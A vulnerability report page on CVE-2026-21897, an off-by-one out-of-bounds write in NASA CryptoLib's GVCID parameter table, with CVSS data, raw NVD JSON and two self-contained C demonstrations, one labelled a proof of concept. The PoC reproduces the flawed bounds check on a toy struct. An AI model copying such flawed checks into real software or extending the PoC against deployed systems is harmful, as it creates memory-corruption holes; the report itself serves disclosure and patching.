Security Vulnerability Report
CVE-2026-21897 CVSS 7.3 HIGH

CVE-2026-21897

Published: 2026-01-10 01:16:17
Last Modified: 2026-01-15 21:48:26

Description

CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, the Crypto_Config_Add_Gvcid_Managed_Parameters function only checks whether gvcid_counter > GVCID_MAN_PARAM_SIZE. As a result, it allows up to the 251st entry, which causes a write past the end of the array, overwriting gvcid_counter located immediately after gvcid_managed_parameters_array[250]. This leads to an out-of-bounds write, and the overwritten gvcid_counter may become an arbitrary value, potentially affecting the parameter lookup/registration logic that relies on it. This issue has been patched in version 1.4.3.
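
The off-by-one described above, as an added example that is not CryptoLib source and not the 1.4.3 patch: a simplified table with one spare guard slot, so the 251st write can be observed without corrupting memory. The entry layout and the names `gvcid_table_t`, `table_add` and `fill` are hypothetical, and the `>=` comparison is an assumed correction.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define GVCID_MAN_PARAM_SIZE 250

/* Simplified entry; the real CryptoLib structure is not reproduced (assumption). */
typedef struct { uint16_t tfvn, scid, vcid; } gvcid_entry_t;

typedef struct {
    /* One spare guard slot keeps the off-by-one write inside this demo object. */
    gvcid_entry_t entries[GVCID_MAN_PARAM_SIZE + 1];
    uint32_t counter;
} gvcid_table_t;

enum check_kind { CHECK_GT /* comparison described for < 1.4.3 */, CHECK_GE /* assumed fix */ };

/* Hypothetical add routine: returns 0 on success, -1 when the table reports full. */
static int table_add(gvcid_table_t *t, enum check_kind kind, gvcid_entry_t e)
{
    int full = (kind == CHECK_GT) ? (t->counter > GVCID_MAN_PARAM_SIZE)
                                  : (t->counter >= GVCID_MAN_PARAM_SIZE);
    if (full)
        return -1;
    t->entries[t->counter++] = e;
    return 0;
}

/* Offers 300 entries; returns how many were accepted and whether the guard changed. */
static unsigned fill(enum check_kind kind, int *guard_touched)
{
    gvcid_table_t t;
    gvcid_entry_t canary;
    unsigned accepted = 0;
    memset(&t, 0, sizeof t);
    memset(&canary, 0xA5, sizeof canary);
    t.entries[GVCID_MAN_PARAM_SIZE] = canary;  /* index 250: first slot past capacity */
    for (unsigned i = 0; i < 300; i++) {
        gvcid_entry_t e = { 0, 0x42, (uint16_t)i };  /* constructed sample values */
        if (table_add(&t, kind, e) == 0)
            accepted++;
    }
    *guard_touched = memcmp(&t.entries[GVCID_MAN_PARAM_SIZE], &canary, sizeof canary) != 0;
    return accepted;
}

int main(void)
{
    int g1, g2;
    unsigned a = fill(CHECK_GT, &g1), b = fill(CHECK_GE, &g2);
    printf("'>'  check: accepted=%u guard_touched=%d\n", a, g1);
    printf("'>=' check: accepted=%u guard_touched=%d\n", b, g2);
    return 0;
}
```

In the affected layout described above there is no guard slot, so the write at index 250 lands on `gvcid_counter` instead.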

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:nasa:cryptolib:*:*:*:*:*:*:*:* - VULNERABLE
NASA CryptoLib < 1.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/* CVE-2026-21897 PoC - CryptoLib Array Out-of-Bounds Write
 * This PoC demonstrates triggering the buffer overflow by adding
 * more than 250 GVCID entries to overwrite gvcid_counter
 */
#include <stdio.h>
#include <stdint.h>

#define GVCID_MAN_PARAM_SIZE 250
#define MAX_ENTRIES 260

typedef struct {
    uint16_t vcid;
    uint16_t tfvn;
    uint16_t scid;
} GvcidManagedParam;

typedef struct {
    GvcidManagedParam params[GVCID_MAN_PARAM_SIZE];
    uint32_t gvcid_counter; // Located right after the array
} GvcidManager;

/* Vulnerable function - only checks counter > GVCID_MAN_PARAM_SIZE */
int Crypto_Config_Add_Gvcid_Managed_Parameters(GvcidManager* mgr, uint16_t tfvn, uint16_t scid, uint16_t vcid) {
    if (mgr->gvcid_counter > GVCID_MAN_PARAM_SIZE) {
        /* Rejects only when the counter exceeds the size; counter == size passes */
        return -1;
    }
    /* BUG: No bounds check on the array index, so index 250 (the 251st entry) is written */
    mgr->params[mgr->gvcid_counter].tfvn = tfvn;
    mgr->params[mgr->gvcid_counter].scid = scid;
    mgr->params[mgr->gvcid_counter].vcid = vcid;
    mgr->gvcid_counter++;
    return 0;
}

int main(void) {
    GvcidManager mgr = {0};
    int result;

    printf("CVE-2026-21897 PoC - CryptoLib OOB Write\n");
    printf("Initial gvcid_counter: %u\n", mgr.gvcid_counter);

    /* Attempt MAX_ENTRIES additions; the 251st is accepted and lands past the array */
    for (int i = 0; i < MAX_ENTRIES; i++) {
        result = Crypto_Config_Add_Gvcid_Managed_Parameters(&mgr, 0, 0, i);
        printf("Entry %d: result=%d, counter=%u\n", i+1, result, mgr.gvcid_counter);
        /* An accepted entry beyond the 250th was written out of bounds */
        if (i >= GVCID_MAN_PARAM_SIZE && result == 0) {
            printf("[VULN] Out-of-bounds write at entry %d!\n", i+1);
        }
    }

    printf("\nFinal gvcid_counter value: %u (corrupted)\n", mgr.gvcid_counter);
    printf("Array capacity: %d, Actual counter: %u\n", GVCID_MAN_PARAM_SIZE, mgr.gvcid_counter);
    return 0;
}

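References

https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 (Release Notes)
https://github.com/nasa/CryptoLib/security/advisories/GHSA-9x7j-gx23-7m5r (Vendor Advisory)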

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21897", "sourceIdentifier": "[email protected]", "published": "2026-01-10T01:16:17.053", "lastModified": "2026-01-15T21:48:26.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, the Crypto_Config_Add_Gvcid_Managed_Parameters function only checks whether gvcid_counter > GVCID_MAN_PARAM_SIZE. As a result, it allows up to the 251st entry, which causes a write past the end of the array, overwriting gvcid_counter located immediately after gvcid_managed_parameters_array[250]. This leads to an out-of-bounds write, and the overwritten gvcid_counter may become an arbitrary value, potentially affecting the parameter lookup/registration logic that relies on it. This issue has been patched in version 1.4.3."}, {"lang": "es", "value": "CryptoLib proporciona una solución únicamente de software utilizando el Protocolo de Seguridad de Enlace de Datos Espaciales CCSDS - Procedimientos Extendidos (SDLS-EP) para asegurar las comunicaciones entre una nave espacial ejecutando el Sistema de Vuelo central (cFS) y una estación terrestre. Antes de la versión 1.4.3, la función Crypto_Config_Add_Gvcid_Managed_Parameters solo verifica si gvcid_counter &gt; GVCID_MAN_PARAM_SIZE. Como resultado, permite hasta la entrada 251, lo que provoca una escritura más allá del final del array, sobrescribiendo gvcid_counter ubicado inmediatamente después de gvcid_managed_parameters_array[250]. Esto conduce a una escritura fuera de límites, y el gvcid_counter sobrescrito puede convertirse en un valor arbitrario, afectando potencialmente la lógica de búsqueda/registro de parámetros que depende de él. 
Este problema ha sido parcheado en la versión 1.4.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nasa:cryptolib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.3", "matchCriteriaId": "AE1BE91E-2901-42AF-BC66-762CFA7A2582"}]}]}], "references": [{"url": "https://github.com/nasa/CryptoLib/releases/tag/v1.4.3", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/nasa/CryptoLib/security/advisories/GHSA-9x7j-gx23-7m5r", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}